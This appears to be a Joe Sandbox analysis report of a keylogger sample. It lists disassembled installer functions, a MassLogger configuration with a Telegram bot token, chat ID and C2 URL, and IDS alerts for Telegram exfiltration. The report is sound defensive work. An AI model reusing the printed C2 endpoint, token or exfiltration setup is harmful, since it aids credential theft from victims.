Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
GetLastError.KERNEL32 ref: 00405976
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
GetLastError.KERNEL32 ref: 00405995

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9

Function 00405DC5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,76232EE0,00405B1A,?,00437800,76232EE0,00000000), ref: 00405D76
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93

lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,76232EE0,00405B1A,?,00437800,76232EE0,00000000), ref: 00405E1E
GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,76232EE0,00405B1A,?,00437800,76232EE0), ref: 00405E2E

Strings

0_B, xrefs: 00405DCB

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 0_B
API String ID: 3248276644-2128305573
Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE

Function 004053C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004053F3
CallWindowProcW.USER32(?,?,?,?), ref: 00405444

Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD

Strings

, xrefs: 004053D4

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E

Function 00405F0D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405F2B
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,76233420,004036EF), ref: 00405F46

Strings

nsa, xrefs: 00405F1A

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

Function 004059D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
CloseHandle.KERNEL32(?), ref: 00405A07

Strings

Error launching installer, xrefs: 004059E4

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C

Function 00406F27 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45

Function 00407128 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45

Function 00406E3E Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45

Function 00406943 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45

Function 00406D91 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45

Function 00406EAF Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45

Function 00406DFB Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45

Function 00405E43 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

Source: 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
Source: b5BQbAhwVD.exe.6424.3.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3387D1EC CryptUnprotectData,		3_2_3387D1EC
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3387D9D9 CryptUnprotectData,		3_2_3387D9D9

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49964 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:49964 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50001 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49978 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49992 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50025 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50001 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50027 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50011 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50025 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50027 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:49992 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50033 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50005 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:49978 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50031 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50011 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50033 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50019 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50005 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50045 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49989 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50031 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50019 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50061 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50045 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:49989 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50009 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50055 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50061 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50009 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50003 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50015 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50055 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49999 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50003 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50041 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:49999 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50041 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50015 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50076 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50072 -> 149.154.167.220:443
